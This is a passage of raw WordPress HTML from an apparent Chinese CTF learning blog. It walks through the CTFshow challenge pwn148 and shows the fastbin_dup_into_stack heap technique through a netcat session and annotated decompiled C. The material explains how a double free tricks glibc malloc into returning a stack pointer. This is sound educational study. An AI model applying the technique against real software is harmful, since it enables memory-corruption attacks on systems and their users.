class=\"wp-image-757\"  
sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-33-1024x975.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"975\" data-original=\"http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-33-1024x975.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-758\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-34-1024x422.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"422\" data-original=\"http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-34-1024x422.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-759\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p id=\"uafd4d754\">ok\uff0c\u5c31\u5230\u8fd9\u91cc<\/p>\n\n\n\n<h2 class=\"wp-block-heading\" 
id=\"Ocw2D\">4\u3001pwn148<\/h2>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-35-1024x746.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"746\" data-original=\"http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-35-1024x746.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-760\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p id=\"u840313f4\">fastbin_dup_into_stack,\u7ee7\u7eed\u5b66\u4e60\u65b0\u4e1c\u897f\uff0c\u5148\u770b\u4e00\u4e0bchecksec<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-36-1024x427.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"427\" data-original=\"http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-36-1024x427.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-761\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p 
id=\"u2a42e815\">\u8bbe\u7f6e\u4e86\u7ec8\u7aef\u80cc\u666f\u989c\u8272\u548c\u900f\u660e\u5ea6hh,<\/p>\n\n\n\n<p id=\"ufacdc54b\">\u7136\u540e\u6211\u4eec\u770b\u770b\u6f14\u793a<\/p>\n\n\n\n<p id=\"u2a42e815\">\u8bbe\u7f6e\u4e86\u7ec8\u7aef\u80cc\u666f\u989c\u8272\u548c\u900f\u660e\u5ea6hh,<\/p>\n\n\n\n<p id=\"ufacdc54b\">\u7136\u540e\u6211\u4eec\u770b\u770b\u6f14\u793a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>faetong@faetong-virtual-machine:~\/pwnit$ nc pwn.challenge.ctf.show 28163\n    \u2584\u2584\u2584\u2584   \u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584  \u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584            \u2584\u2584                           \n  \u2588\u2588\u2580\u2580\u2580\u2580\u2588  \u2580\u2580\u2580\u2588\u2588\u2580\u2580\u2580  \u2588\u2588\u2580\u2580\u2580\u2580\u2580\u2580            \u2588\u2588                           \n \u2588\u2588\u2580          \u2588\u2588     \u2588\u2588        \u2584\u2584\u2588\u2588\u2588\u2588\u2588\u2584  \u2588\u2588\u2584\u2588\u2588\u2588\u2588\u2584   \u2584\u2588\u2588\u2588\u2588\u2584  \u2588\u2588      \u2588\u2588\n \u2588\u2588           \u2588\u2588     \u2588\u2588\u2588\u2588\u2588\u2588\u2588   \u2588\u2588\u2584\u2584\u2584\u2584 \u2580  \u2588\u2588\u2580   \u2588\u2588  \u2588\u2588\u2580  \u2580\u2588\u2588 \u2580\u2588  \u2588\u2588  \u2588\u2580\n \u2588\u2588\u2584          \u2588\u2588     \u2588\u2588         \u2580\u2580\u2580\u2580\u2588\u2588\u2584  \u2588\u2588    \u2588\u2588  \u2588\u2588    \u2588\u2588  \u2588\u2588\u2584\u2588\u2588\u2584\u2588\u2588 \n  \u2588\u2588\u2584\u2584\u2584\u2584\u2588     \u2588\u2588     \u2588\u2588        \u2588\u2584\u2584\u2584\u2584\u2584\u2588\u2588  \u2588\u2588    \u2588\u2588  \u2580\u2588\u2588\u2584\u2584\u2588\u2588\u2580  \u2580\u2588\u2588  \u2588\u2588\u2580 \n    \u2580\u2580\u2580\u2580      \u2580\u2580     \u2580\u2580         \u2580\u2580\u2580\u2580\u2580\u2580   \u2580\u2580    \u2580\u2580    
\u2580\u2580\u2580\u2580     \u2580\u2580  \u2580\u2580  \n    * *************************************                           \n    * Classify: CTFshow --- PWN --- \u5165\u95e8                              \n    * Type  : Heap_Exploitation                                       \n    * Site  : https:\/\/ctf.show\/                                       \n    * Hint  : Fastbin_dup_into_stack -- Double free                   \n    * *************************************                           \n\u901a\u8fc7\u6b3a\u9a97 malloc \u4f7f\u5f97\u8fd4\u56de\u4e00\u4e2a\u6307\u5411\u53d7\u63a7\u4f4d\u7f6e\u7684\u6307\u9488\uff08\u672c\u4f8b\u4e3a\u6808\u4e0a\uff09\n\u901a\u8fc7 malloc \u7533\u8bf7\u5230 0x7ffed3cf1770.\n\u5148\u7533\u8bf73 \u4e2a chunk\nchunk a: 0x2362010\nchunk b: 0x2362030\nchunk c: 0x2362050\nfree \u6389 chunk a\n\u5982\u679c\u8fd8\u5bf9 0x2362010 \u8fdb\u884c free, \u7a0b\u5e8f\u4f1a\u5d29\u6e83\u3002\u56e0\u4e3a 0x2362010 \u73b0\u5728\u662f fastbin \u7684\u7b2c\u4e00\u4e2a\n\u5148\u5bf9 b 0x2362030 \u8fdb\u884c free\n\u63a5\u4e0b\u6765\u5c31\u53ef\u4ee5\u5bf9 0x2362010 \u518d\u6b21\u8fdb\u884c free \u4e86, \u73b0\u5728\u5df2\u7ecf\u4e0d\u662f\u5b83\u5728 fastbin \u7684\u7b2c\u4e00\u4e2a\u4e86\n\u73b0\u5728 fastbin \u7684\u94fe\u8868\u662f &#91; 0x2362010, 0x2362030, 0x2362010 ] \u63a5\u4e0b\u6765\u901a\u8fc7\u4fee\u6539 0x2362010 \u4e0a\u7684\u5185\u5bb9\u6765\u8fdb\u884c\u653b\u51fb.\n\u7b2c\u4e00\u6b21 malloc(8): 0x2362010\n\u7b2c\u4e8c\u6b21 malloc(8): 0x2362030\n\u73b0\u5728 fastbin \u8868\u4e2d\u53ea\u5269 &#91; 0x2362010 ] \u4e86\n\u63a5\u4e0b\u6765\u5f80 0x2362010 \u6808\u4e0a\u5199\u4e00\u4e2a\u5047\u7684 size\uff0c\u8fd9\u6837 malloc \u4f1a\u8bef\u4ee5\u4e3a\u90a3\u91cc\u6709\u4e00\u4e2a\u7a7a\u95f2\u7684 chunk\uff0c\u4ece\u800c\u7533\u8bf7\u5230\u6808\u4e0a\u53bb\n\u73b0\u5728\u8986\u76d6 0x2362010 \u524d\u9762\u7684 8 \u5b57\u8282\uff0c\u4fee\u6539 fd \u6307\u9488\u6307\u5411 stack_var \u524d\u9762 0x20 
\u7684\u4f4d\u7f6e\n\u7b2c\u4e09\u6b21 malloc(8): 0x2362010, \u628a\u6808\u5730\u5740\u653e\u5230 fastbin \u94fe\u8868\u4e2d\n\u8fd9\u4e00\u6b21 malloc(8) \u5c31\u7533\u8bf7\u5230\u4e86\u6808\u4e0a\u53bb: 0x7ffed3cf1770\n<\/code><\/pre>\n\n\n\n<p id=\"ufe4af0c3\">\u8fd8\u662f\u8fd0\u7528\u4e86double free\uff0c\u7136\u540e\u5f80fastbin0x2362030\u7684\u6808\u4e0a\u5199\u4e86\u4e00\u4e2a\u5047size\u6b3a\u9a97\u4e86malloc<\/p>\n\n\n\n<p id=\"u1514694d\">double free\u4e4b\u540e\u7684fastbin:<\/p>\n\n\n\n<p id=\"u1797b0b0\">main_arena-&gt;chunk[0]-&gt;chunk[1]-&gt;chunk[0]-&gt;0<\/p>\n\n\n\n<p id=\"ud28550ad\">\u73b0\u5728\u9488\u5bf90\u8fdb\u884c\u653b\u51fb\uff0c\u73b0\u5728\u628achunk[0]\u548cchunk[1]\u7533\u8bf7\u8d70<\/p>\n\n\n\n<p id=\"udec364ae\">main_arena-&gt;chunk[0]-&gt;0<\/p>\n\n\n\n<p id=\"u10cbaf8b\">\u63a5\u4e0b\u6765\u7684\u64cd\u4f5c\u628afastbin\u53d8\u4e3a\uff1a<\/p>\n\n\n\n<p id=\"ud547396e\">main_arena-&gt;chunk[0]-&gt;stack_addr<\/p>\n\n\n\n<p id=\"u78bdf586\">\u7136\u540e\u628achunk[0]\u548cstack_addr\u6240\u5728chunk\u7533\u8bf7\u8d70\uff0c\u83b7\u5f97\u4e86\u5728\u6808\u4e0a\u5199\u7684\u6743\u9650<\/p>\n\n\n\n<p id=\"u04e1ecc5\">\u8fd9\u91cc\u7684\u64cd\u4f5c\u5176\u5b9e\u4e0d\u662f\u592a\u61c2\uff0c\u6211\u4eec\u770b\u770b\u4ee3\u7801\u624d\u80fd\u77e5\u9053<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>void __cdecl demo()\n{\n  __int64 v0; \/\/ &#91;rsp+0h] &#91;rbp-50h] BYREF\n  unsigned __int64 stack_var; \/\/ &#91;rsp+8h] &#91;rbp-48h]\n  char *AAAAAAAA; \/\/ &#91;rsp+10h] &#91;rbp-40h] BYREF\n  char *b; \/\/ &#91;rsp+18h] &#91;rbp-38h]\n  char *c; \/\/ &#91;rsp+20h] &#91;rbp-30h]\n  unsigned __int64 *d; \/\/ &#91;rsp+28h] &#91;rbp-28h]\n  char *e; \/\/ &#91;rsp+30h] &#91;rbp-20h]\n  char *f; \/\/ &#91;rsp+38h] &#91;rbp-18h]\n  char *g; \/\/ &#91;rsp+40h] &#91;rbp-10h]\n  unsigned __int64 v9; \/\/ &#91;rsp+48h] &#91;rbp-8h]\n\n  v9 = __readfsqword(0x28u);\n  fwrite(&amp;ptr_, 1u, 0x57u, stderr);\n  fprintf(stderr, &amp;format_, 
&amp;AAAAAAAA);\n  fwrite(&amp;ptr__0, 1u, 0x15u, stderr);\n  \/\/\u521b\u5efachunk&#91;0]\n  AAAAAAAA = (char *)malloc(8u);   \n  strcpy(AAAAAAAA, \"AAAAAAAA\");\n  \/\/\u521b\u5efachunk&#91;1]\n  b = (char *)malloc(8u);\n  strcpy(b, \"BBBBBBBB\");\n  c = (char *)malloc(8u);\n  \/\/\u521b\u5efachunk&#91;2]\n  strcpy(c, \"CCCCCCCC\");\n  fprintf(stderr, \"chunk a: %p\\n\", AAAAAAAA);\n  fprintf(stderr, \"chunk b: %p\\n\", b);\n  fprintf(stderr, \"chunk c: %p\\n\", c);\n  fwrite(&amp;ptr__1, 1u, 0x11u, stderr);\n  \/\/\u91ca\u653echunk&#91;0]\n  free(AAAAAAAA);\n  fprintf(stderr, &amp;format__0, AAAAAAAA, AAAAAAAA);\n  fprintf(stderr, &amp;format__1, b);\n  \/\/\u91ca\u653echunk&#91;1]\n  free(b);\n  fprintf(stderr, &amp;format__2, AAAAAAAA);\n  \/\/\u518d\u6b21\u91ca\u653echunk&#91;0]\uff0cglibc\u53ea\u68c0\u67e5fastbin\u5934\u90e8\u662f\u5426\u4e3a\u540c\u4e00\u4e2a\u6307\u9488\uff0c\u4e2d\u95f4\u9694\u4e86free(b)\u6240\u4ee5\u4e0d\u4f1a\u62a5\u9519\n  free(AAAAAAAA);\n  fprintf(stderr, &amp;format__3, AAAAAAAA, b, AAAAAAAA, AAAAAAAA);\n  \/\/\u7533\u8bf7\u56dechunk&#91;0]\uff0cd\u6765\u63a7\u5236malloc\u7684\u8fd4\u56de\u503c\n  d = (unsigned __int64 *)malloc(8u);\n  fprintf(stderr, &amp;format__4, d);\n  \/\/\u7533\u8bf7\u56dechunk&#91;1]\n  e = (char *)malloc(8u);\n  strcpy(e, \"EEEEEEEE\");\n  fprintf(stderr, &amp;format__5, e);\n  fprintf(stderr, &amp;format__6, AAAAAAAA);\n  fprintf(stderr, &amp;format__7, AAAAAAAA);\n  stack_var = 32;\n  fprintf(stderr, &amp;format__8, AAAAAAAA);\n  \/\/\u4e0b\u9762\u5199\u5165\u4e86fake fd\uff0c\u662f\u6808\u5730\u5740\n  *d = (unsigned __int64)&amp;v0;\n  f = (char *)malloc(8u);\n  strcpy(f, \"FFFFFFFF\");\n  fprintf(stderr, &amp;format__9, f);\n  g = (char *)malloc(8u);\n  strcpy(g, \"GGGGGGGG\");\n  fprintf(stderr, &amp;format__10, g);\n}<\/code><\/pre>\n\n\n\n<p id=\"u82c1aeb7\">\u4e0b\u9762\u6211\u4eec\u6765\u8bd5\u7740\u8c03\u8bd5\u770b\u770b\u8fd9\u4e2a\u8fc7\u7a0b<\/p>\n\n\n\n<p id=\"ud1c69f25\">\u9996\u5148\u662f\u4e09\u4e2a\u5bf9\u7a7a\u95f4\u7684\u5206\u914d<\/p>\n\n\n\n<figure 
class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-37-1024x409.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"409\" data-original=\"http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-37-1024x409.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-762\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p><br>\u5728\u4e09\u4e2amalloc\u6267\u884c\u5b8c\u4ee5\u540e\u6211\u4eec\u770b\u5230chunk\u5df2\u7ecf\u521b\u5efa\u597d\u4e86<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-38-919x1024.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"919\" height=\"1024\" data-original=\"http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-38-919x1024.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-763\"  sizes=\"auto, (max-width: 919px) 100vw, 919px\" \/><\/div><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><div 
class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-39-1024x449.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"449\" data-original=\"http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-39-1024x449.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-764\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p><br>\u63a5\u4e0b\u6765\u5c31\u662f\u6784\u6210fastbin:main_arena->chunk[0]->chunk[1]->chunk[0]<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-40-864x1024.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"864\" height=\"1024\" data-original=\"http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-40-864x1024.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-765\"  sizes=\"auto, (max-width: 864px) 100vw, 864px\" \/><\/div><\/figure>\n\n\n\n<p><br>\u8fd9\u6761\u94fe\u5f88\u660e\u663e\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper 
lazyload-container-unload' data-fancybox='post-images' href='http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-41.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"919\" height=\"601\" data-original=\"http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-41.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-766\"  sizes=\"auto, (max-width: 919px) 100vw, 919px\" \/><\/div><\/figure>\n\n\n\n<p><br>\u63a5\u4e0b\u6765\u662f\u7533\u8bf7\u56dechunk[0]<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-42-1024x588.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"588\" data-original=\"http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-42-1024x588.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-767\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p id=\"ua0f3148e\">main_arena-&gt;chunk[1]-&gt;chunk[0]<\/p>\n\n\n\n<p id=\"u7a512229\">\u63a5\u4e0b\u6765\u7533\u8bf7\u56dechunk[1]\u7136\u540e\u5199\u5165\u5047fd<\/p>\n\n\n\n<figure class=\"wp-block-image 
size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-43-1024x257.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"257\" data-original=\"http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-43-1024x257.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-768\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p><br>\u8fd9\u4e2a\u662f\u5199\u5165F\u4ee5\u540e\uff0c\u9a6c\u4e0a\u8981\u5199\u5165G<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-44-1024x392.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"392\" data-original=\"http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-44-1024x392.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-769\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' 
data-fancybox='post-images' href='http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-45-1024x326.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"326\" data-original=\"http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-45-1024x326.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-770\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p><br>\u6b64\u65f6\u5df2\u7ecf\u53ef\u4ee5\u5728\u6808\u4e0a\u5199\u5165<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-46-1024x948.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"948\" data-original=\"http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-46-1024x948.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-771\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<h2 